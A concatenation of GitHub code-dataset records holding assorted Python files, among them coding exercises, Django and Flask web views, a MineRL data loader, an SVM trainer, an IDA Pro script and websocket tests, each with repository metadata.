range(len(row)):\n\t\t\tif int(row[j]) > maxNum:\n\t\t\t\tmaxNum = int(row[j])\n\t\t\tif int(row[j]) < minNum:\n\t\t\t\tminNum = int(row[j])\n\t\tcheckSum += (maxNum - minNum)\n\t\tmaxNum = -sys.maxsize - 1\n\t\tminNum = sys.maxsize\n\n\tprint(checkSum)\n\ndef problem2(path):\n\tlines = readFile(path)\n\trow = \"\"\n\tdiv = 0.0\n\tcheckSum = 0\n\tfor i in range(len(lines)):\n\t\trow = lines[i].split(\"\t\")\n\t\tfor j in range(len(row)):\n\t\t\tfor k in range(len(row)):\n\t\t\t\tif k!=j and (float(row[j]) % float(row[k]) == 0):\n\t\t\t\t\tdiv = float(row[j]) / float(row[k])\n\t\t\t\t\tbreak\n\t\t\tif div!= 0:\n\t\t\t\tcheckSum += div\n\t\t\t\tdiv = 0\n\t\t\t\tbreak\n\n\tprint(checkSum)\n\n\ndef readFile(path):\n\twith open(path, \"r\") as f:\n\t\ttemp = f.read().splitlines()\n\treturn temp\n\nproblem2(\"input.txt\")","repo_name":"lbruges/AoC","sub_path":"adventDay2.py","file_name":"adventDay2.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3054883152","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.authtoken.serializers import AuthTokenSerializer\nfrom rest_framework.views import APIView\nfrom django.http import HttpResponse\nfrom knox.auth import AuthToken, TokenAuthentication\nfrom .serializers import RegisterSerializer\nfrom rest_framework import status, permissions, request\nfrom knox.views import LoginView\nfrom django.contrib.auth import login\n\ndef serialize_user(user):\n return {\n \"username\": user.username,\n \"email\": user.email,\n \"name\": user.first_name,\n }\n\nclass LoginAPI(LoginView):\n permission_classes = (permissions.AllowAny,)\n\n def post(self, request, format=None):\n serializer = AuthTokenSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n login(request, user)\n user_info = super(LoginAPI, self).post(request, format=None)\n serializer = serialize_user(user)\n user_info.data['username'] = serializer['username']\n user_info.data['email'] = serializer['email']\n user_info.data['name'] = serializer['name']\n return Response({'user_info': user_info.data}) \n\n@api_view(['POST'])\ndef register(request):\n serializer = RegisterSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n user = serializer.save()\n _, token = AuthToken.objects.create(user)\n return Response({\n \"user_info\": serialize_user(user),\n \"token\": token\n })\n\n@api_view(['GET'])\ndef get_user(request):\n user = request.user\n if user.is_authenticated:\n return Response({\n 'user_info': serialize_user(user)\n })\n return Response({'error_message': 'tidak terautentikasi'}, status.HTTP_401_UNAUTHORIZED)\n\nclass VerifyToken(APIView):\n def post(self, request):\n token = request.headers[\"Authorization\"][6:14]\n try:\n user = AuthToken.objects.get(token_key=token)\n return HttpResponse(user)\n except AuthToken.DoesNotExist:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, detail=\"Token salah\")\n ","repo_name":"ghifariaulia/auth-law","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8147757890","text":"\"\"\"\nA program to convert a number to hours, minutes, \nand seconds in a 24-hour clock format.\n\"\"\"\n\n#index will add s if plural\ndef singlePlural(num):\n if num == 1:\n return 0\n else:\n return 1\n \nsuffix = [\"\", \"s\"]\n\n#prompt the user to enter a number\ntime = int(input(\"Enter a number from 1 to 86400: \"))\n\n#conversion to hours, minutes, seconds\nhours = time // 3600\noutput_hours = \"hour{}\".format(suffix[singlePlural(hours)])\n \nminutes = (time % 3600) // 60\noutput_minutes = \"minute{}\".format(suffix[singlePlural(minutes)])\n\nseconds = (time % 3600) % 60\noutput_seconds = \"second{}\".format(suffix[ singlePlural(seconds)])\n\n#print conversion in hours, minutes, seconds\nprint(\"{} {}, {} {}, and {} {}\".format(hours, output_hours, minutes, output_minutes, seconds, output_seconds))\n","repo_name":"StphnWright/Numbering-Algorithms","sub_path":"problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21011504713","text":"import os\nimport minerl\nimport numpy as np\nfrom torch.utils.data import Dataset\nfrom tqdm import tqdm\n\nDATASET_SIZE = 1916597\n\n\ndef dump_minerl_dataset(names, output_dir):\n if not isinstance(names, list):\n names = [names]\n\n initial_size = 1916597\n \n os.makedirs(output_dir)\n\n pov = np.memmap(output_dir + '/pov.npy', dtype='uint8', mode='w+', shape=(initial_size, 64, 64, 3))\n vec = np.memmap(output_dir + '/vector.npy', dtype='f', mode='w+', shape=(initial_size, 64))\n act = np.memmap(output_dir + '/action.npy', dtype='f', mode='w+', shape=(initial_size, 64))\n rew = np.memmap(output_dir + '/reward.npy', dtype='f', mode='w+', shape=(initial_size, 1))\n don = np.memmap(output_dir + '/done.npy', dtype='?', mode='w+', shape=(initial_size, 1))\n written = 0\n\n for name in names:\n minerl_dset = minerl.data.make(name, \"data\")\n\n for trajectory in tqdm(minerl_dset.get_trajectory_names()):\n traj_data = list(minerl_dset.load_data(trajectory))\n\n for i, data in enumerate(traj_data):\n current_state, action, reward, next_state, done = data\n idx = written + i\n pov[idx] = current_state['pov']\n vec[idx] = current_state['vector']\n act[idx] = action['vector']\n rew[idx, 0] = reward\n don[idx, 0] = done\n\n size = len(traj_data)\n written += size\n return written\n\n\nclass MineRlSequenceDataset(Dataset):\n def __init__(self, base_dir, sequence_length):\n initial_size = 1916597\n self.pov = np.memmap(base_dir + '/pov.npy', dtype='uint8', mode='r', shape=(initial_size, 64, 64, 3))\n self.vec = np.memmap(base_dir + '/vector.npy', dtype='f', mode='r', shape=(initial_size, 64))\n self.act = np.memmap(base_dir + '/action.npy', dtype='f', mode='r', shape=(initial_size, 64))\n self.rew = np.memmap(base_dir + '/reward.npy', dtype='f', mode='r', shape=(initial_size, 1))\n self.don = np.memmap(base_dir + '/done.npy', dtype='?', mode='r', shape=(initial_size, 1))\n self.sequence_length = sequence_length\n\n def __len__(self):\n return self.pov.shape[0] - self.sequence_length + 1\n\n def __getitem__(self, idx):\n end_idx = idx + self.sequence_length\n pov = np.float32(self.pov[idx:end_idx].transpose(0, 3, 1, 2)) / 255\n vec = self.vec[idx:end_idx]\n act = self.act[idx:end_idx]\n rew = self.rew[idx:end_idx]\n don = self.don[idx:end_idx].astype('float32')\n return (pov, vec, act, rew, don)\n\n \nclass MineRlImageDataset(Dataset):\n def __init__(self, base_dir, transform=None):\n initial_size = 1916597\n self.transform = transform\n self.pov = np.memmap(base_dir + '/pov.npy', dtype='uint8', mode='r', shape=(initial_size, 64, 64, 3))\n\n def __len__(self):\n return self.pov.shape[0]\n\n def __getitem__(self, idx):\n image = self.pov[idx]\n if self.transform:\n image = self.transform(image)\n return image","repo_name":"marthinwurer/minerl_stuff","sub_path":"dataset_preprocessing.py","file_name":"dataset_preprocessing.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14432230081","text":"#!/usr/bin/python3\n\n\ndef list_division(my_list_1, my_list_2, list_length):\n new_list = []\n for i in range(list_length):\n try:\n new = my_list_1[i] / my_list_2[i]\n except (TypeError, ValueError):\n new = 0\n print(\"wrong type\")\n except ZeroDivisionError:\n new = 0\n print(\"division by 0\")\n except IndexError:\n print(\"out of range\")\n new = 0\n finally:\n new_list.append(new)\n return (new_list)\n","repo_name":"EdithM5/alx-higher_level_programming","sub_path":"0x05-python-exceptions/4-list_division.py","file_name":"4-list_division.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70478053857","text":"__author__ = 'Land'\r\n# http://people.duke.edu/~ccc14/pcfb/numpympl/MatplotlibBarPlots.html\r\n\r\n# http://blog.csdn.net/ywjun0919/article/details/8692018\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\n\r\n# 0-1 has 1000\r\n#x = np.random.normal(0,1,1000)\r\n\r\n# [0, 10) to get 30\r\n#x = np.random.randint(0, 10, 30)\r\n\r\n\r\n#x = np.linspace(0, 10, 11)\r\n# seperate with 5 part index\r\n\r\n\r\nx= [1, 1, 1, 2, 3,3,5, 5, ]\r\nnumBins = 3\r\nax.hist(x, numBins, color='green', alpha =0.8)\r\nprint(x)\r\ncounts, bins = np.histogram(x, numBins)\r\nprint(counts)\r\nprint(bins)\r\n#counts_n = counts / (sum (counts * np.diff(len(bins))))\r\n\r\nplt.show()\r\n","repo_name":"herofyf/python_examples","sub_path":"histplot.py","file_name":"histplot.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17598292700","text":"from data_structures.datacenter import Datacenter\nfrom requests.adapters import HTTPAdapter, Retry\nimport requests\n\nURL = \"http://www.mocky.io/v2/5e539b332e00007c002dacbe\"\n\n\ndef get_data(url, max_retries=5):\n session = requests.Session()\n retries = Retry(total=max_retries,\n backoff_factor=0.1)\n\n session.mount('http://', HTTPAdapter(max_retries=retries))\n response = session.get(url)\n return response.json()\n\ndef main():\n \"\"\"\n Main entry to our program.\n \"\"\"\n\n data = get_data(URL)\n if not data:\n raise ValueError('No data to process')\n\n datacenters = [\n Datacenter(key, value)\n for key, value in data.items()\n ]\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"georgespanac/ro_interview_assignment_vodafone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21507336147","text":"import numpy as np\nimport csv\nfrom cvxopt import matrix\nfrom cvxopt import solvers\nimport pandas as pd\nimport time\nimport json\nimport os\ndirname = os.path.dirname(__file__)\n# image size: 28x28, number of features = 784\nn = 784 \n# noise parameter\nC = 1.0\n\ndef KernelMat(X, gamma = 0.05):\n norm = np.linalg.norm(X,axis = 1, keepdims = True)\n norm_sq = norm*norm\n norm_sq_exp = np.exp(-1*gamma*norm_sq)\n dot_mat = np.exp(2*gamma*(X.dot(X.T)))\n kernel_mat = norm_sq_exp*dot_mat*(norm_sq_exp.T)\n return kernel_mat\n\ndef learn_model(d1,d2,train_file_name, verbose = 0 ):\n\n##### storing the training data ####\n\n # start timer\n start = time.time()\n Xd1 = [] # training data with label = d1\n Xd2 = [] # training data with label = d2\n file_train = open(train_file_name)\n csvReader = csv.reader(file_train)\n for row in csvReader:\n row_val = list(map(float, row))\n ## down scale data to range [0,1] from [0,255] ##\n if row_val[-1] == d1:\n Xd1.append(list(map( lambda x: x/255.0 ,row_val[:n])))\n elif row_val[-1] == d2:\n Xd2.append(list(map( lambda x: x/255.0 ,row_val[:n])))\n file_train.close()\n\n nd1 = len(Xd1)\n nd2 = len(Xd2)\n Xd1 = np.array(Xd1).reshape(nd1,-1)\n Xd2 = np.array(Xd2).reshape(nd2,-1)\n\n X = np.append(Xd1,Xd2,0) # [X] = mxn\n m = X.shape[0] # number of training examples\n y = np.concatenate((np.ones((nd1,1))*(-1.0), np.ones((nd2,1))), axis = 0)\n K = KernelMat(X)\n\n I = np.identity(m)\n I_bar = I * -1\n\n P = K * np.outer(y,y) # element wise multiplication\n q = np.ones((m,1))*(-1)\n A = np.concatenate((np.ones((nd1,1))*(-1.0),np.ones((nd2,1))*1.0),axis=0).T\n b = np.array([0]).reshape(1,1)\n G = np.append(I,I_bar,0) # [G] = 2m x m\n h = [C for i in range(m)] + [0 for i in range(m)] # [h] = 2m x 1\n\n P = matrix(P, tc = 'd')\n q = matrix(q, tc = 'd')\n G = matrix(G, tc = 'd')\n h = matrix(h, tc = 'd')\n A = matrix(A, tc = 'd')\n b = matrix(b, tc = 'd')\n\n sol = solvers.qp(P,q,G,h,A,b)\n alpha = sol['x']\n alpha = np.array(alpha)\n sv=X[np.ix_(alpha[:,0]>0.0000001,)] # support vectors \n sv_y = y[np.ix_(alpha[:,0]>0.0000001,)] # nsvx1\n alpha_sv = alpha[np.ix_(alpha[:,0]>0.0000001,)] # nsvx1\n print(\"No. of support vectors: \" + str(sv.shape[0]))\n\n # end timer\n end = time.time()\n print(\"Time taken to learn the model: \" + str(end-start))\n\n b1 = float(\"inf\")\n b2 = float(\"-inf\")\n for i in range(m):\n if alpha[i] > 0.00001:\n val = 0\n for j in range(m):\n if alpha[j] > 0.000001:\n val += alpha[j] * y[j] * K[i][j]\n if i
    \r\n Upload File:\r\n
    \r\n \r\n
    \r\n Netoyer es ville en doubles\r\n
    \r\n
    \r\n Lower case the name of the city\r\n
    \r\n
    \r\n recompt le nombre d'aire de jeux par département et par commune\r\n
    \r\n
    \r\n Fichier des villes
    \r\n Fichier des département
    \r\n
    \r\n
    \r\n creer le fichier site map\r\n
    \r\n
    \r\n Ajouter des dates sur les enregistrements de la base de données\r\n
    \r\n
    \r\n Affichage des enregistrement a valider\r\n
    \r\n
    \r\n Ajout a partir d'un fichier de type json\r\n
    \r\n
    \r\n Ajout a partir d'un fichier de type csv\r\n
    \r\n
    \r\n Ajout d'une limite autour des villes\r\n
    \r\n
    \r\n Ajout d'une limite autour des départements\r\n
    \r\n
    \r\n Simplifier les url des aires des jeux\r\n
    \r\n
    \r\n Ajouter les nombres manquants pour la ville de Caen\r\n
    \r\n
    \r\n Ajouter carvin\r\n
    \r\n
    \" % listheadtext\n\toutsidetag = _outertags.get(elemID, None)\n\tif outsidetag is not None:\n\t\theadnarrative = \"<%s>%s\" % (outsidetag, headnarrative)\n\t\tfootnarrative = \"\" % outsidetag\n\tinsidetag = _innertags.get(elemID, None)\n\tif insidetag is not None:\n\t\theadnarrative = \"%s<%s>\" % (headnarrative, insidetag)\n\t\tfootnarrative = \"%s\" % (insidetag, footnarrative)\n\tif outsidetag is not None or insidetag is not None:\n\t\tif headnarrative:\n\t\t\tnewdata['list_header'] = headnarrative\n\t\tif footnarrative:\n\t\t\tnewdata['list_footer'] = footnarrative\n\tcheckunchecktag = _checkunchecktags.get(elemID, None)\n\tif checkunchecktag is not None:\n\t\tcurrentchecked = element.get('checked_narrative', '')\n\t\tcurrentunchecked = element.get('unchecked_narrative', '')\n\t\tnewdata['checked_narrative'] = \"<%s>%s\" % (checkunchecktag, currentchecked, checkunchecktag)\n\t\tnewdata['unchecked_narrative'] = \"<%s>%s\" % (checkunchecktag, currentunchecked, checkunchecktag)\n\tlisttag = _presuftag.get(elemID, None)\n\tif listtag is not None:\n\t\tnewdata['list_prefix'] = \"<%s>\" % listtag\n\t\tnewdata['list_suffix'] = \"\" % listtag\n\tsublisttag = _sublisttags.get(elemID, None)\n\tif sublisttag is not None:\n\t\tnewdata['sublist_prefix'] = \"<%s>\" % sublisttag\n\t\tnewdata['sublist_suffix'] = \"\" % sublisttag\n\tif newdata:\n\t\tfor k, v in newdata.iteritems():\n\t\t\telement[k] = unicode(v)\n\telse: pass\n\ndef setup_form(pyform):\n\t\"\"\"The one function to bind them all.\n\tCalls the current implementation functions which set order_num,\n\tfield_ids, and data pertaining to the narrative.\"\"\"\n\tnew_set_order(pyform)\n\tnew_set_ids(pyform)\n\tnew_set_nar(pyform)","repo_name":"StickOnGit/pyfml","sub_path":"controllers/reorderform.py","file_name":"reorderform.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7580972111","text":"# coding : utf-8\n\n\nd = {1: 100, 2: 200, 3: 300}\n'''\nusername = input('Введите имя пользователя: ')\npassword = input('Введите пароль: ')\n\n\nwhile True:\n\tif len(password) < 8:\n\t\tprint('Пароль слишком короткий')\n\telif username.lower() in password.lower():\n\t\tprint(\"Пароль содержит имя пользователя\")\n\telif not '@' in password:\n\t\tprint('В пароле должна быть собака @')\n\telse:\n\t\tprint('Пароль для пользователя {} установлен'.format(username))\n\t\tbreak\n\t\t#continue Тоже самое что и break\n\tpassword = input('Введите пароль еще раз: ')\n'''\n\n\n\ntry:\n\tprint(d[5])\nexcept KeyError:\n\tprint('Такого ключа неееееееееет!!!!!!!!')\n\n","repo_name":"Dariec/DevNet","sub_path":"help/06-3-PasswordCheck.py","file_name":"06-3-PasswordCheck.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28864967781","text":"from elastictools.logsconf.log_conf import logging_config\nimport logging\nfrom logging.config import dictConfig\n\n\ndictConfig(logging_config)\nlogger = logging.getLogger(\"CONSOLE\")\n\n\ndef range(**kwargs):\n ranges = {}\n for key in kwargs.keys():\n ranges[\"range\"] = {key: {\"gte\": kwargs[key][0], \"lte\": kwargs[key][1]}}\n query = {\"query\": ranges}\n return query\n\n\ndef boolq(**kwargs):\n logical = {}\n for key in kwargs.keys():\n match = []\n for values in kwargs[key]:\n match.append({\"match\": {values[0]: values[1]}})\n logical[key] = match\n query = {\"query\": {\"bool\": logical}}\n return query\n\n\ndef createQuery(**kwargs):\n q_dictionary = dict()\n bool_dictionary = dict()\n if 'all' in kwargs.keys():\n q_dictionary = {\"query\": {\"match_all\": {}}}\n if 'limit' in kwargs.keys():\n q_dictionary[\"from\"] = 0\n q_dictionary[\"size\"] = kwargs['limit']\n '''for boolkey, boolvalues in kwargs.items():\n temp = []\n for key, values in boolvalues.items():\n if isinstance(values, list):\n temp.append({\"range\": {key: {\"gte\": values[0], \"lte\": values[1]}}})\n elif isinstance(values, set):\n values = list(values)\n match = []\n for val in values:\n temp.append({\"match\": {key: val}})\n else:\n temp.append({\"match\": {key: values}})\n bool_dictionary[boolkey] = temp\n if bool(bool_dictionary): \n q_dictionary[\"query\"] = bool_dictionary'''\n print(q_dictionary)\n return q_dictionary\n\n\ndef createQueryString(**kwargs):\n stringq = ''\n for value in kwargs['lucene']:\n stringq += ' ' + value\n q_dictionary = {\"query\": stringq}\n return {\"query\": {\"query_string\": q_dictionary}}\n\n\ndef addSource(q, source):\n q[\"_source\"] = source\n return q\n","repo_name":"AerinSistemas/elastictools","sub_path":"aerastic/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74473825056","text":"import flask\nfrom flask import jsonify, request\nfrom flask_cors import CORS\nimport json\nimport re\nimport string\nimport uuid\nimport requests\nfrom dotenv import load_dotenv\nimport os\n\nSTATIC_DIR = os.environ.get(\"STATIC_DIR\", \"./static\").rstrip(\"/\")\nprint(\"static dir:\", STATIC_DIR)\n\nif os.environ.get(\"USE_DEEPAI\") == \"true\":\n print(\"using deepai\")\n import deepai_images as generate_images\nelse:\n print(\"using stablediffusion\")\n import stablediff_images as generate_images\n\nimport video\n\nload_dotenv()\n\nallowed_origins=re.compile('(.*\\.)?deepgram\\.com(:\\d+)?')\n\napp = flask.Flask(__name__)\nCORS(app, origins=\"*\")\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef transcribe():\n if request.method == 'GET':\n return 'Hello, world!'\n else:\n request_id = uuid.uuid4()\n request_dir=f\"{STATIC_DIR}/{request_id}/\"\n\n if flask.request.is_json:\n req = flask.request.get_json()\n audio = requests.get(req[\"url\"]).content\n else:\n audio = flask.request.get_data()\n\n transcript = fetch_transcript(audio)\n if isinstance(transcript, str):\n # A string response indicates an error. Return it, and call it a 500 because error handling is boring\n return transcript, 500\n\n os.mkdir(request_dir)\n\n audio_path = request_dir + \"audio\"\n with open(audio_path, \"wb\") as audiof:\n audiof.write(audio)\n\n images = generate_images.text_to_images(transcript, request_dir)\n print(images)\n \n output_path = request_dir + \"video.mp4\"\n video.generate_video(audio_path, transcript, images, output_path)\n\n return {\"path\": f\"/assets/{request_id}/video.mp4\"}\n\n\n@app.route('/assets/', methods=['GET'])\ndef assets(path):\n print(\"sending %s from %s\" % (path, STATIC_DIR))\n return flask.send_from_directory(STATIC_DIR, path)\n\ndef fetch_transcript(audio: bytes):\n deepgram_response = requests.post(\"https://api.deepgram.com/v1/listen?model=general&language=en&tier=enhanced&punctuate=true&utterances=true\", headers={\n 'Authorization': 'Token {}'.format(os.environ.get(\"DEEPGRAM_API_KEY\"))\n }, data=audio)\n\n if deepgram_response.ok:\n response = deepgram_response.json()\n else:\n response = deepgram_response.text\n \n return response\n","repo_name":"deepgram-devs/nightmare-slideshows","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4682419192","text":"import idc\nimport idaapi\n\ndef main():\n\taddr = idaapi.get_screen_ea()\n\tif addr == idc.BADADDR:\n\t\tprint(\"Make sure you are in a function!\")\n\t\tidaapi.beep()\n\t\treturn\n\n\tfunc = idaapi.get_func(addr)\n\tif func is None:\n\t\tprint(\"Make sure you are in a function!\")\n\t\tidaapi.beep()\n\t\treturn\n\t\n\tfuncname = idaapi.get_name(func.start_ea)\n\tdemangled = idaapi.demangle_name(funcname, idc.get_inf_attr(idc.INF_SHORT_DN))\n\tprint(f\"{demangled or funcname}:\")\n\tprint(f\"Offset from {func.start_ea:08X} to {addr:08X} = {addr - func.start_ea} ({addr - func.start_ea:#X})\")\n\nmain()","repo_name":"Scags/IDA-Scripts","sub_path":"distfromfunc.py","file_name":"distfromfunc.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"34"} +{"seq_id":"20258767261","text":"from django.shortcuts import render,redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom .forms import SignUpForm,UserUpdateForm\nfrom .models import UserDetail\nfrom rest_framework.response import Response\nimport jwt, datetime\nfrom rest_framework.exceptions import AuthenticationFailed\n\n\n# user details\n@login_required(login_url='login')\ndef user_details(request):\n token = request.session.get('jwt')\n if not token:\n raise AuthenticationFailed(detail='No token')\n try:\n payload = jwt.decode(token, 'secret', algorithms=['HS256'])\n except jwt.ExpiredSignatureError:\n raise AuthenticationFailed(detail='Invalid token')\n \n users = User.objects.all()\n user_details = UserDetail.objects.all()\n print(user_details)\n return render(request, 'main/user_details.html', {'users': users, 'user_details': user_details})\n\n\n# login with email and password\ndef login_view(request):\n if request.user is not None and request.user.is_authenticated:\n return redirect('user_details')\n if request.method == \"POST\":\n email = request.POST['email']\n username = User.objects.get(email=email).username\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n\n if user is not None:\n login(request, user)\n payload = {\n 'id': user.id,\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=5),\n 'iat': datetime.datetime.utcnow(),\n }\n\n token = jwt.encode(payload, 'secret', algorithm='HS256')\n request.session['jwt']=token\n return redirect('user_details')\n else:\n return render(request, 'main/login.html', {'error_message': 'Invalid login'})\n return render(request, 'main/login.html')\n \n\n# logout view\n@login_required(login_url='login')\ndef logout_view(request):\n del request.session['jwt']\n logout(request)\n return redirect('login')\n\n# signup view\ndef signup(request):\n form = SignUpForm(request.POST)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('login')\n else:\n return render(request, 'main/signup.html', {'form': form})\n\n else:\n form = SignUpForm()\n return render(request, 'main/signup.html', {'form': form})\n\n\n\n# delete user_details\n@login_required(login_url='login')\ndef user_delete(request,email):\n token = request.session.get('jwt')\n if not token:\n raise AuthenticationFailed(detail='No token')\n try:\n payload = jwt.decode(token, 'secret', algorithms=['HS256'])\n except jwt.ExpiredSignatureError:\n raise AuthenticationFailed(detail='Invalid token')\n user = User.objects.get(email=email)\n user_details = UserDetail.objects.get(user=user)\n user_details.delete()\n user.delete()\n return redirect('user_details')\n\n\n# update user_details\n@login_required(login_url='login')\ndef user_update(request,email):\n token = request.session.get('jwt')\n if not token:\n raise AuthenticationFailed(detail='No token')\n try:\n payload = jwt.decode(token, 'secret', algorithms=['HS256'])\n except jwt.ExpiredSignatureError:\n raise AuthenticationFailed(detail='Invalid token')\n user = User.objects.get(email=email)\n user_detail = UserDetail.objects.get(user=user) \n form = UserUpdateForm(request.POST or None)\n if request.method == 'POST':\n if form.is_valid():\n form.save(user.pk)\n return redirect('user_details')\n else:\n return redirect('user_update',email)\n\n else:\n form = UserUpdateForm()\n return render(request, 'main/user_update.html', {'form': form, 'user':user_detail})\n\n\n\n\n\n\n","repo_name":"AYHD-youtube/nemesis-task","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31388195813","text":"# -*- coding: utf-8 -*-\n# pylint: disable=consider-using-with\nimport subprocess\nimport time\nimport pytest\nfrom eodhdc import EODHDWebSockets, exceptions\n\n\n@pytest.mark.asyncio\n@pytest.mark.eodhdws\n@pytest.mark.parametrize(\"case\", [\n [dict(key=\"demo\"), \"uk\", [\"TSLA\"], exceptions.WebsocketUnknownEndpoint],\n [dict(key=\"demo1\"), \"us\", [\"TSLA\"], exceptions.WebsocketAuthError],\n [dict(key=\"demo\"), \"us\", [\"TSLA1\"], exceptions.WebsocketResponseError]\n])\nasync def test_eodhdws_exceptions(case):\n \"\"\"Module exceptions tests.\"\"\"\n wss = subprocess.Popen([\"python\", \"tests/wss.py\"])\n time.sleep(0.3)\n with pytest.raises(case[3]):\n eodhdws = EODHDWebSockets(**case[0])\n eodhdws.base = \"ws://127.0.0.1:8001/ws\"\n async with eodhdws.connect(case[1]) as websocket:\n await eodhdws.subscribe(websocket, case[2])\n await eodhdws.receive(websocket).__anext__()\n wss.terminate()\n\n\n@pytest.mark.asyncio\n@pytest.mark.eodhdws\nasync def test_eodhdws_flow():\n \"\"\"Client flow test.\"\"\"\n wss = subprocess.Popen([\"python\", \"tests/wss.py\"])\n time.sleep(0.3)\n eodhdws = EODHDWebSockets(buffer=10)\n eodhdws.base = \"ws://127.0.0.1:8001/ws\"\n async with eodhdws.connect(\"us\") as websocket:\n eodhdws.activate()\n await eodhdws.subscribe(websocket, [\"TSLA\", \"MSFT\"])\n await eodhdws.unsubscribe(websocket, [\"MSFT\"])\n async for msg in eodhdws.receive(websocket):\n assert len(msg)\n eodhdws.deactivate()\n assert len(eodhdws.buffer)\n wss.terminate()\n","repo_name":"wargx/eodhdc","sub_path":"tests/test_eodhdws.py","file_name":"test_eodhdws.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"39694937244","text":"from pycbio.tsv import TsvTable, TsvReader\n\n# inId\tselectId\tinOverlap\tselectOverlap\toverBases\tsimilarity\ntypeMap = {\n \"inOverlap\": float,\n \"selectOverlap\": float,\n \"overBases\": int,\n \"similarity\": float}\n\n\nclass OverlapSelectStatsReader(TsvReader):\n \"reader for output from overlapSelect -statsOutput\"\n\n def __init__(self, fileName):\n super(OverlapSelectStatsReader, self).__init__(fileName, typeMap=typeMap)\n\n\nclass OverlapSelectStatsTbl(TsvTable):\n \"table of overlapSelect -statsOutput results\"\n def __init__(self, fileName):\n super(OverlapSelectStatsTbl, self).__init__(fileName, typeMap=typeMap, multiKeyCols=(\"inId\", \"selectId\"))\n\n\n__all__ = [OverlapSelectStatsReader.__name__, OverlapSelectStatsTbl.__name__]\n","repo_name":"diekhans/pycbio","sub_path":"lib/pycbio/hgdata/overlapSelectStats.py","file_name":"overlapSelectStats.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"5911415671","text":"c = int(input())\r\nanswer = []\r\n\r\nfor i in range(c):\r\n temp = list(map(int, input().split()))\r\n total = temp.pop(0)\r\n avg = sum(temp)/total\r\n cnt = 0\r\n \r\n for e in temp:\r\n if e > avg:\r\n cnt += 1\r\n \r\n ratio = (cnt/total) * 100\r\n \r\n answer.append(round(ratio, 3))\r\n\r\nfor e in answer:\r\n print('{:.3f}%'.format(e))","repo_name":"minzihun/algorithm-study","sub_path":"백준/Bronze/4344.평균은 넘겠지/평균은 넘겠지.py","file_name":"평균은 넘겠지.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70152239139","text":"# This module computes the the Weyl scalars based on\n# Baker, Campanelli, and Lousto. PRD 65, 044001 (2002);\n# https://arxiv.org/abs/gr-qc/0104063\n\n# Step 1: import all needed modules from NRPy+:\nimport NRPy_param_funcs as par\nimport indexedexp as ixp\nimport grid as gri\nimport finite_difference as fin\nimport reference_metric as rfm\nrfm.reference_metric()\nfrom outputC import *\nimport BSSN_RHSs as bssn\nimport sympy as sp\n\n# Step 1: Initialize WeylScalar parameters\nthismodule = __name__\n# Use proper names for Tetrad Choices. If no name given (hunt the literature), then use the literature reference as the name.\nTetradChoice = par.initialize_param(par.glb_param(\"char\", thismodule, \"TetradChoice\", \"Approx_QuasiKinnersley\"))\n# Why are these needed?\n# xorig = par.initialize_param(par.glb_param(\"REAL\", thismodule, \"xorig\", \"0.0\"))\n# yorig = par.initialize_param(par.glb_param(\"REAL\", thismodule, \"yorig\", \"0.0\"))\n# zorig = par.initialize_param(par.glb_param(\"REAL\", thismodule, \"zorig\", \"0.0\"))\n# offset = par.initialize_param(par.glb_param(\"REAL\", thismodule, \"offset\", \"1.0e-15\"))\n\n# Step 2: Define the Levi-Civita symbol, used with tetrads <- better description 